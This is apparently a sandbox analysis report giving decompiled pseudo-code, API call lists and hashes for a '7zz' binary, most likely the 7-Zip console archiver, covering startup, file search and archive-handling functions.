				 *((intOrPtr*)(_t79 - 0x10)) = 0;
				E00401E9A(_t79 - 0x18, 3);
				 *(_t79 - 4) = 0;
				if(L0040B863(_t79 - 0x18) != 0) {
					_t53 = FindFirstFileW( *(_t79 - 0x18), _t79 - 0x3c0); // executed
					 *_t77 = _t53;
				}
				 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
				L00407A18( *(_t79 - 0x18));
				goto L6;
			}










                                                                                  0x0040b179
                                                                                  0x0040b185
                                                                                  0x0040b187
                                                                                  0x0040b18e
                                                                                  0x0040b27c
                                                                                  0x0040b280
                                                                                  0x0040b288
                                                                                  0x0040b288
                                                                                  0x0040b197
                                                                                  0x0040b19d
                                                                                  0x0040b215
                                                                                  0x0040b21a
                                                                                  0x0040b221
                                                                                  0x0040b229
                                                                                  0x0040b232
                                                                                  0x0040b24b
                                                                                  0x0040b24d
                                                                                  0x0040b255
                                                                                  0x0040b259
                                                                                  0x0040b25e
                                                                                  0x0040b263
                                                                                  0x0040b26e
                                                                                  0x0040b26e
                                                                                  0x0040b273
                                                                                  0x0040b279
                                                                                  0x00000000
                                                                                  0x0040b279
                                                                                  0x0040b1b0
                                                                                  0x0040b1b5
                                                                                  0x0040b1b7
                                                                                  0x0040b1f9
                                                                                  0x0040b1f9
                                                                                  0x0040b1fd
                                                                                  0x0040b208
                                                                                  0x0040b208
                                                                                  0x00000000
                                                                                  0x0040b1fd
                                                                                  0x0040b1be
                                                                                  0x0040b1c1
                                                                                  0x0040b1c4
                                                                                  0x0040b1c7
                                                                                  0x0040b1d2
                                                                                  0x0040b1dc
                                                                                  0x0040b1e8
                                                                                  0x0040b1ea
                                                                                  0x0040b1ea
                                                                                  0x0040b1ef
                                                                                  0x0040b1f3
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0040B179
                                                                                    • Part of subcall function 0040B154: FindClose.KERNELBASE(00000000,?,0040B18C), ref: 0040B15F
                                                                                  • FindFirstFileW.KERNELBASE(000000FF,?,?), ref: 0040B1B0
                                                                                  • FindFirstFileW.KERNELBASE(00000002,?,00000003), ref: 0040B1E8
                                                                                  • AreFileApisANSI.KERNEL32(000000FF), ref: 0040B221
                                                                                  • FindFirstFileA.KERNEL32(?,?,00000001), ref: 0040B242
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$First$ApisCloseH_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 4121580741-0
                                                                                  • Opcode ID: f763ac5f82e435b8d6b012c7509676add0fd9d54bd021928ef73c32a673d885f
                                                                                  • Instruction ID: fbd6ce0b626e89321ef8dbff40679b25df86b8bcd2a774ab2a160b2ca2317645
                                                                                  • Opcode Fuzzy Hash: f763ac5f82e435b8d6b012c7509676add0fd9d54bd021928ef73c32a673d885f
                                                                                  • Instruction Fuzzy Hash: F0316B3180020ADBCB15EFA4D8459EDBB78FF04324F20466EE461B72E1DB395A85CB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0046CF4C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 71%
                                                                                  			_entry_(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				unsigned int _t8;
				intOrPtr _t18;
				intOrPtr _t19;
				signed int _t25;
				intOrPtr _t41;

				_t37 = __edi;
				_push(0xffffffff);
				_push(0x47c8a0);
				_push(E0046CE74);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t41;
				_push(__edi);
				_v28 = _t41 - 0x10;
				_t8 = GetVersion();
				 *0x4936fc = 0;
				_t25 = _t8 & 0x000000ff;
				 *0x4936f8 = _t25;
				 *0x4936f4 = _t25 << 8;
				 *0x4936f0 = _t8 >> 0x10;
				if(E0046EA66(_t25 << 8, 1) == 0) {
					E0046D061(0x1c);
				}
				if(E0046E31C() == 0) {
					E0046D061(0x10);
				}
				_v8 = _v8 & 0x00000000;
				E0046FCD7(); // executed
				 *0x49659c = GetCommandLineA();
				 *0x493670 = E00470AD6();
				E00470889();
				E004707D0();
				L0046E6C8();
				_t18 =  *0x49370c; // 0x23512c0
				 *0x493710 = _t18;
				_push(_t18);
				_push( *0x493704);
				_push( *0x493700); // executed
				_t19 = E00405C72(_v8); // executed
				_v32 = _t19;
				L0046E6F5(_t19);
				_v36 =  *((intOrPtr*)( *_v24));
				return E00470658(_t37, _v8,  *((intOrPtr*)( *_v24)), _v24);
			}













                                                                                  0x0046cf4c
                                                                                  0x0046cf4f
                                                                                  0x0046cf51
                                                                                  0x0046cf56
                                                                                  0x0046cf61
                                                                                  0x0046cf62
                                                                                  0x0046cf6e
                                                                                  0x0046cf6f
                                                                                  0x0046cf72
                                                                                  0x0046cf7c
                                                                                  0x0046cf84
                                                                                  0x0046cf8a
                                                                                  0x0046cf95
                                                                                  0x0046cf9e
                                                                                  0x0046cfad
                                                                                  0x0046cfb1
                                                                                  0x0046cfb6
                                                                                  0x0046cfbe
                                                                                  0x0046cfc2
                                                                                  0x0046cfc7
                                                                                  0x0046cfc8
                                                                                  0x0046cfcc
                                                                                  0x0046cfd7
                                                                                  0x0046cfe1
                                                                                  0x0046cfe6
                                                                                  0x0046cfeb
                                                                                  0x0046cff0
                                                                                  0x0046cff5
                                                                                  0x0046cffa
                                                                                  0x0046cfff
                                                                                  0x0046d000
                                                                                  0x0046d006
                                                                                  0x0046d00c
                                                                                  0x0046d014
                                                                                  0x0046d018
                                                                                  0x0046d024
                                                                                  0x0046d030

                                                                                  APIs
                                                                                  • GetVersion.KERNEL32 ref: 0046CF72
                                                                                    • Part of subcall function 0046EA66: HeapCreate.KERNELBASE(00000000,00001000,00000000,0046CFAA,00000001), ref: 0046EA77
                                                                                    • Part of subcall function 0046EA66: HeapDestroy.KERNEL32 ref: 0046EAB6
                                                                                  • GetCommandLineA.KERNEL32 ref: 0046CFD1
                                                                                    • Part of subcall function 0046D061: ExitProcess.KERNEL32 ref: 0046D07E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$CommandCreateDestroyExitLineProcessVersion
                                                                                  • String ID: h8p
                                                                                  • API String ID: 1387771204-4263480909
                                                                                  • Opcode ID: fd750bc3cd7585849bbac3ab2b54539f5ca51bea4ec0c39904099df9b32006d9
                                                                                  • Instruction ID: 870f0fd66317059e0ff95abc7fdc162525e316738eefe618a921cd101cb68cd4
                                                                                  • Opcode Fuzzy Hash: fd750bc3cd7585849bbac3ab2b54539f5ca51bea4ec0c39904099df9b32006d9
                                                                                  • Instruction Fuzzy Hash: EF2105F0940201AFE718BFA2DC42B7A7BA4EB26715F00413FF404A63A1EB3C49008B5E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040C5F4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E0040C5F4() {
				struct _SYSTEM_INFO _v40;

				GetSystemInfo( &_v40); // executed
				return _v40.dwNumberOfProcessors;
			}




                                                                                  0x0040c5fe
                                                                                  0x0040c608

                                                                                  APIs
                                                                                  • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,004012EC,00000000,00000000,00490AB0), ref: 0040C5FE
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoSystem
                                                                                  • String ID:
                                                                                  • API String ID: 31276548-0
                                                                                  • Opcode ID: 1c5c9b3bbc459ceaa168d8dbf2743ba381f88a3378da8e3fc4aaaada2f7fab74
                                                                                  • Instruction ID: 2873cf6bad21c2a51a49be2c119f9dc910efd3d225da868e7d860f0ff405fddb
                                                                                  • Opcode Fuzzy Hash: 1c5c9b3bbc459ceaa168d8dbf2743ba381f88a3378da8e3fc4aaaada2f7fab74
                                                                                  • Instruction Fuzzy Hash: 2DC09B74D0420D97CB00E7E5D94E88E77FCE748105F400461D515E3141E670F99587E6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0046E6AA Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E0046E6AA() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(0x46e664); // executed
				 *0x4936e8 = _t1;
				return _t1;
			}




                                                                                  0x0046e6af
                                                                                  0x0046e6b5
                                                                                  0x0046e6ba

                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNELBASE(Function_0006E664), ref: 0046E6AF
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: c7f1619ac543780bbf34eb8e95484e4113401968d6038d2ffaa388747d46fa77
                                                                                  • Instruction ID: a5106b7f6ad9fc50672dff64106b0fe435b0594dc7b9e21cd679f57e89e9b924
                                                                                  • Opcode Fuzzy Hash: c7f1619ac543780bbf34eb8e95484e4113401968d6038d2ffaa388747d46fa77
                                                                                  • Instruction Fuzzy Hash: 56A012745013009A82105F10A8084083A50A260A037500036500040210D6700494490B
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004264F7 Relevance: 32.4, APIs: 16, Strings: 2, Instructions: 904COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 85%
                                                                                  			E004264F7(signed int __ecx, void* __eflags) {
				signed int _t500;
				signed int _t511;
				signed int _t525;
				intOrPtr* _t545;
				signed int _t547;
				signed int _t550;
				signed int _t551;
				signed int _t556;
				signed int _t561;
				signed int _t562;
				intOrPtr* _t573;
				intOrPtr* _t574;
				signed int _t588;
				signed int _t598;
				signed int _t599;
				signed int _t602;
				void* _t611;
				intOrPtr* _t613;
				signed int _t615;
				signed int _t617;
				signed int _t618;
				signed int _t632;
				signed int _t633;
				signed int _t641;
				signed int _t642;
				signed int _t643;
				signed int _t650;
				signed int _t661;
				signed int _t662;
				signed int _t663;
				signed int _t669;
				signed int _t683;
				signed int _t684;
				intOrPtr _t686;
				signed int _t687;
				signed char _t689;
				char _t691;
				signed int _t692;
				signed int _t697;
				signed int _t702;
				signed int _t713;
				intOrPtr _t754;
				intOrPtr _t755;
				signed int _t763;
				intOrPtr* _t769;
				char _t792;
				signed int _t805;
				signed int _t835;
				signed int _t854;
				signed int _t874;
				signed int _t876;
				intOrPtr _t878;
				signed int* _t881;
				signed int _t882;
				signed int _t883;
				signed int _t884;
				intOrPtr* _t885;
				intOrPtr* _t886;
				intOrPtr _t888;
				signed int _t889;
				signed int _t890;
				void* _t891;
				intOrPtr* _t892;
				signed int _t893;
				signed int _t894;
				void* _t895;

				L0046B890(0x476819, _t895);
				_t878 =  *((intOrPtr*)(_t895 + 0x18));
				_t874 = __ecx;
				 *(_t895 - 0x14) = __ecx;
				if(E0042CD7D(_t878) == 0) {
					L93:
					_t500 = 0x80004001;
					L144:
					 *[fs:0x0] =  *((intOrPtr*)(_t895 - 0xc));
					return _t500;
				}
				_t713 = 0;
				 *((char*)( *((intOrPtr*)(_t895 + 0x28)))) = 0;
				E00405B9F(_t895 - 0x38);
				 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
				 *(_t895 - 4) = 0;
				 *((intOrPtr*)(_t895 - 0x5c)) = 0;
				L00467C60(_t895 - 0x58);
				 *(_t895 - 4) = 1;
				E0040C9B4(_t895 - 0x5c,  *(_t895 + 8));
				 *(_t895 - 0x10) = 0;
				if( *((intOrPtr*)(_t878 + 0x30)) <= 0) {
					L20:
					 *((intOrPtr*)(_t895 - 0x3c)) =  *((intOrPtr*)( *((intOrPtr*)(_t895 + 0x18)) + 8));
					E004264A2(_t895 - 0x108);
					 *(_t895 - 4) = 4;
					L00427466(_t895 - 0xb8);
					 *(_t895 - 4) = 5;
					L00427107( *((intOrPtr*)(_t895 + 0x18)), _t895 - 0x108);
					if( *_t874 == _t713) {
						L22:
						E0040862D();
						_t511 =  *(_t874 + 0x74);
						_t881 = _t874 + 0x74;
						if(_t511 != _t713) {
							 *((intOrPtr*)( *_t511 + 8))(_t511);
							 *_t881 = _t713;
						}
						if( *((intOrPtr*)(_t874 + 0x68)) != _t713) {
							_push(0x88); // executed
							_t683 = L004079F2(); // executed
							 *(_t895 + 8) = _t683;
							 *(_t895 - 4) = 6;
							if(_t683 == _t713) {
								_t684 = 0;
								__eflags = 0;
							} else {
								_t684 = L0042732B(_t683);
							}
							 *(_t895 - 4) = 5;
							 *((intOrPtr*)(_t874 + 0x6c)) = _t684;
							E0040C9B4(_t881, _t684);
							_t686 =  *((intOrPtr*)(_t874 + 0x6c));
							if(_t686 == _t713) {
								_t687 = 0;
								__eflags = 0;
							} else {
								_t687 = _t686 + 4;
							}
							 *((intOrPtr*)(_t874 + 0x70)) = _t687;
						}
						_t882 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t874 + 0x70))))))(_t895 - 0x108);
						_t916 = _t882 - _t713;
						if(_t882 == _t713) {
							__eflags =  *((intOrPtr*)(_t895 - 0x3c)) - _t713;
							 *(_t895 - 0x18) = _t713;
							if(__eflags <= 0) {
								L51:
								L0042743A(_t874 + 4, __eflags, _t895 - 0x108);
								 *_t874 = 1;
								L52:
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t874 + 0x70)))) + 4))();
								__eflags =  *((intOrPtr*)(_t895 - 0x3c)) - _t713;
								 *(_t895 + 0x10) = _t713;
								 *(_t895 - 0x40) = _t713;
								 *(_t895 - 0x1c) = _t713;
								if( *((intOrPtr*)(_t895 - 0x3c)) <= _t713) {
									L135:
									E004241A3(_t895 - 0x108,  *((intOrPtr*)( *((intOrPtr*)(_t895 - 0xc0)))), _t895 - 0x7c, _t895 - 0x120);
									__eflags =  *((intOrPtr*)(_t874 + 0x68)) - _t713;
									if( *((intOrPtr*)(_t874 + 0x68)) != _t713) {
										 *((intOrPtr*)( *((intOrPtr*)(_t874 + 0x6c)) + 0x70)) =  *((intOrPtr*)(_t895 - 0x7c));
									}
									__eflags =  *((intOrPtr*)(_t895 - 0x3c)) - _t713;
									if( *((intOrPtr*)(_t895 - 0x3c)) != _t713) {
										E00404AD0(_t895 - 0x11c, 4);
										 *((intOrPtr*)(_t895 - 0x11c)) = 0x47b1f8;
										 *(_t895 - 4) = 0x2a;
										E0040867E(_t895 - 0x11c,  *((intOrPtr*)(_t895 - 0x30)));
										_t883 = 0;
										__eflags =  *((intOrPtr*)(_t895 - 0x30)) - _t713;
										if( *((intOrPtr*)(_t895 - 0x30)) <= _t713) {
											L142:
											 *((intOrPtr*)(_t895 - 0x78)) =  *((intOrPtr*)(_t895 + 0x1c));
											_t525 =  *(_t874 + 0x74);
											_t884 =  *((intOrPtr*)( *_t525 + 0xc))(_t525,  *((intOrPtr*)(_t895 - 0x110)), _t713,  *((intOrPtr*)(_t895 - 0x30)), _t895 - 0x78, _t713, 1,  *((intOrPtr*)(_t895 + 0x20)));
											 *(_t895 - 4) = 5;
											E00408604(_t895 - 0x11c);
											 *(_t895 - 4) = 1;
											L004272DB(_t895 - 0x108, __eflags);
											 *(_t895 - 4) = _t713;
											L00427310(_t895 - 0x5c);
											_t493 = _t895 - 4;
											 *_t493 =  *(_t895 - 4) | 0xffffffff;
											__eflags =  *_t493;
											E0042434D(_t895 - 0x38);
											L143:
											_t500 = _t884;
											goto L144;
										} else {
											goto L141;
										}
										do {
											L141:
											E00415C6D(_t895 - 0x11c,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t895 - 0x2c)) + _t883 * 4)))));
											_t883 = _t883 + 1;
											__eflags = _t883 -  *((intOrPtr*)(_t895 - 0x30));
										} while (_t883 <  *((intOrPtr*)(_t895 - 0x30)));
										goto L142;
									} else {
										 *(_t895 - 4) = 0x28;
										E00408604(_t895 - 0xb8);
										 *(_t895 - 4) = 1;
										L00423635(_t895 - 0x108, __eflags);
										 *(_t895 - 4) = _t713;
										DeleteCriticalSection(_t895 - 0x58);
										L0043361B(_t895 - 0x5c);
										 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
										 *(_t895 - 4) = 0x29;
										goto L139;
									}
								}
								 *(_t895 - 0x10) = _t713;
								do {
									 *(_t895 + 8) = _t713;
									 *(_t895 - 0x20) =  *( *((intOrPtr*)( *((intOrPtr*)(_t895 + 0x18)) + 0xc)) +  *(_t895 - 0x1c) * 4);
									_t885 =  *((intOrPtr*)( *(_t895 - 0x10) +  *((intOrPtr*)(_t874 + 0x84))));
									_t545 =  *_t885;
									 *(_t895 - 4) = 0x12;
									 *((intOrPtr*)( *_t545))(_t545, 0x47a528, _t895 + 8);
									_t547 =  *(_t895 + 8);
									__eflags = _t547 - _t713;
									if(_t547 == _t713) {
										L58:
										__eflags = _t547 - _t713;
										 *(_t895 - 4) = 5;
										if(_t547 != _t713) {
											 *((intOrPtr*)( *_t547 + 8))(_t547);
										}
										__eflags =  *((intOrPtr*)(_t895 + 0x2c)) - _t713;
										if( *((intOrPtr*)(_t895 + 0x2c)) == _t713) {
											L66:
											 *(_t895 - 0x24) = _t713;
											_t886 =  *_t885;
											 *(_t895 - 4) = 0x1a;
											 *((intOrPtr*)( *_t886))(_t886, 0x47a478, _t895 - 0x24);
											_t550 =  *(_t895 - 0x24);
											__eflags = _t550 - _t713;
											if(_t550 == _t713) {
												L73:
												__eflags = _t550 - _t713;
												 *(_t895 - 4) = 5;
												if(_t550 != _t713) {
													 *((intOrPtr*)( *_t550 + 8))(_t550);
												}
												_t551 =  *(_t895 - 0x20);
												 *(_t895 - 0x10) =  *(_t895 - 0x10) + 4;
												 *(_t895 - 0x14) =  *(_t551 + 0x14);
												 *(_t895 + 8) =  *(_t551 + 0x18);
												E00404AD0(_t895 - 0x90, 4);
												 *((intOrPtr*)(_t895 - 0x90)) = 0x47b1d4;
												 *(_t895 - 4) = 0x24;
												E00404AD0(_t895 - 0xa4, 4);
												 *((intOrPtr*)(_t895 - 0xa4)) = 0x47b1d4;
												 *(_t895 - 4) = 0x25;
												E0040867E(_t895 - 0x90,  *(_t895 - 0x14));
												_t556 = E0040867E(_t895 - 0xa4,  *(_t895 + 8));
												__eflags =  *(_t895 + 8) - _t713;
												if( *(_t895 + 8) <= _t713) {
													_t888 =  *((intOrPtr*)(_t895 + 0x18));
													goto L95;
												} else {
													_t888 =  *((intOrPtr*)(_t895 + 0x18));
													do {
														_t556 = E00415C6D(_t895 - 0xa4,  *(_t888 + 0x48) +  *(_t895 - 0x40) * 8);
														 *(_t895 - 0x40) =  *(_t895 - 0x40) + 1;
														_t251 = _t895 + 8;
														 *_t251 =  *(_t895 + 8) - 1;
														__eflags =  *_t251;
													} while ( *_t251 != 0);
													L95:
													__eflags =  *(_t895 - 0x14) - _t713;
													 *(_t895 - 0x20) = _t713;
													if( *(_t895 - 0x14) <= _t713) {
														goto L112;
													} else {
														goto L96;
													}
													do {
														L96:
														_t754 =  *((intOrPtr*)(_t888 + 0x1c));
														 *(_t895 + 8) = _t713;
														__eflags = _t754 - _t713;
														if(_t754 <= _t713) {
															L100:
															_t561 = _t556 | 0xffffffff;
															__eflags = _t561;
															L101:
															__eflags = _t561 - _t713;
															if(_t561 < _t713) {
																_t755 =  *((intOrPtr*)(_t888 + 0x30));
																 *(_t895 + 8) = _t713;
																__eflags = _t755 - _t713;
																if(_t755 <= _t713) {
																	L108:
																	_t562 = _t561 | 0xffffffff;
																	__eflags = _t562;
																	L109:
																	__eflags = _t562 - _t713;
																	if(_t562 < _t713) {
																		 *(_t895 - 4) = 0x24;
																		E00408604(_t895 - 0xa4);
																		 *(_t895 - 4) = 5;
																		E00408604(_t895 - 0x90);
																		 *(_t895 - 4) = 0x26;
																		E00408604(_t895 - 0xb8);
																		 *(_t895 - 4) = 1;
																		L00423635(_t895 - 0x108, __eflags);
																		 *(_t895 - 4) = _t713;
																		DeleteCriticalSection(_t895 - 0x58);
																		L0043361B(_t895 - 0x5c);
																		 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
																		 *(_t895 - 4) = 0x27;
																		E0040862D();
																		 *(_t895 - 4) =  *(_t895 - 4) | 0xffffffff;
																		E00408604(_t895 - 0x38);
																		_t500 = 0x80004005;
																		goto L144;
																	}
																	_t763 =  *(_t895 + 0x14);
																	goto L111;
																}
																_t574 =  *((intOrPtr*)(_t888 + 0x34));
																while(1) {
																	__eflags =  *_t574 -  *(_t895 + 0x10);
																	if( *_t574 ==  *(_t895 + 0x10)) {
																		break;
																	}
																	 *(_t895 + 8) =  *(_t895 + 8) + 1;
																	_t574 = _t574 + 4;
																	__eflags =  *(_t895 + 8) - _t755;
																	if( *(_t895 + 8) < _t755) {
																		continue;
																	}
																	goto L108;
																}
																_t562 =  *(_t895 + 8);
																goto L109;
															}
															_t562 =  *( *((intOrPtr*)(_t888 + 0x20)) + 4 + _t561 * 8);
															_t763 =  *(_t888 + 0x48);
															goto L111;
														}
														_t573 =  *((intOrPtr*)(_t888 + 0x20));
														while(1) {
															__eflags =  *_t573 -  *(_t895 + 0x10);
															if( *_t573 ==  *(_t895 + 0x10)) {
																break;
															}
															 *(_t895 + 8) =  *(_t895 + 8) + 1;
															_t573 = _t573 + 8;
															__eflags =  *(_t895 + 8) - _t754;
															if( *(_t895 + 8) < _t754) {
																continue;
															}
															goto L100;
														}
														_t561 =  *(_t895 + 8);
														goto L101;
														L111:
														E00415C6D(_t895 - 0x90, _t763 + _t562 * 8);
														 *(_t895 - 0x20) =  *(_t895 - 0x20) + 1;
														 *(_t895 + 0x10) =  *(_t895 + 0x10) + 1;
														_t556 =  *(_t895 - 0x20);
														__eflags = _t556 -  *(_t895 - 0x14);
													} while (_t556 <  *(_t895 - 0x14));
													goto L112;
												}
											}
											_t769 =  *((intOrPtr*)(_t895 + 0x24));
											__eflags = _t769 - _t713;
											if(_t769 == _t713) {
												__eflags = _t550 - _t713;
												 *(_t895 - 4) = 5;
												if(_t550 != _t713) {
													 *((intOrPtr*)( *_t550 + 8))(_t550);
												}
												 *(_t895 - 4) = 0x1b;
												E00408604(_t895 - 0xb8);
												 *(_t895 - 4) = 1;
												L00423635(_t895 - 0x108, __eflags);
												 *(_t895 - 4) = _t713;
												DeleteCriticalSection(_t895 - 0x58);
												L0043361B(_t895 - 0x5c);
												 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
												 *(_t895 - 4) = 0x1c;
												_t884 = 0x80004005;
												L133:
												E0040862D();
												 *(_t895 - 4) =  *(_t895 - 4) | 0xffffffff;
												E00408604(_t895 - 0x38);
												goto L143;
											}
											 *(_t895 - 0x18) = _t713;
											 *(_t895 - 4) = 0x1d;
											_t884 =  *((intOrPtr*)( *_t769 + 0xc))(_t769, _t895 - 0x18);
											__eflags = _t884 - _t713;
											if(_t884 != _t713) {
												__imp__#6( *(_t895 - 0x18));
												_t588 =  *(_t895 - 0x24);
												 *(_t895 - 4) = 5;
												__eflags = _t588 - _t713;
												if(_t588 != _t713) {
													 *((intOrPtr*)( *_t588 + 8))(_t588);
												}
												 *(_t895 - 4) = 0x1e;
												E00408604(_t895 - 0xb8);
												 *(_t895 - 4) = 1;
												L00423635(_t895 - 0x108, __eflags);
												 *(_t895 - 4) = _t713;
												DeleteCriticalSection(_t895 - 0x58);
												L0043361B(_t895 - 0x5c);
												 *((intOrPtr*)(_t895 - 0x38)) = 0x47b208;
												 *(_t895 - 4) = 0x1f;
												goto L133;
											}
											 *(_t895 - 0x64) = _t713;
											 *(_t895 - 0x60) = _t713;
											 *((intOrPtr*)(_t895 - 0x68)) = 0x47a7ec;
											 *(_t895 - 4) = 0x20;
											 *((char*)( *((intOrPtr*)(_t895 + 0x28)))) = 1;
											L00403532(_t895 - 0x74,  *(_t895 - 0x18));
											 *(_t895 - 4) = 0x21;
											_t891 =  *((intOrPtr*)(_t895 - 0x70)) +  *((intOrPtr*)(_t895 - 0x70));
											L0040FA26(_t895 - 0x68, _t891);
											__eflags =  *((intOrPtr*)(_t895 - 0x70)) - _t713;
											 *(_t895 + 8) = _t713;
											if( *((intOrPtr*)(_t895 - 0x70)) <= _t713) {
												L71:
												_t598 =  *(_t895 - 0x24);
												_t599 =  *((intOrPtr*)( *_t598 + 0xc))(_t598,  *(_t895 - 0x60), _t891);
												_push( *((intOrPtr*)(_t895 - 0x74)));
												_t884 = _t599;
												__eflags = _t884 - _t713;
												if(_t884 != _t713) {
													L00407A18();
													 *((intOrPtr*)(_t895 - 0x68)) = 0x47a7ec;
													L00407A18( *(_t895 - 0x60));
													__imp__#6( *(_t895 - 0x18));
													_t602 =  *(_t895 - 0x24);
													 *(_t895 - 4) = 5;
													__eflags = _t602 - _t713;
													if(_t602 != _t713) {
														 *((intOrPtr*)( *_t602 + 8))(_t602);
													}
													 *(_t895 - 4) = 0x22;
													E00408604(_t895 - 0xb8);
													 *(_t895 - 4) = 1;
													L00423635(_t895 - 0x108, __eflags);
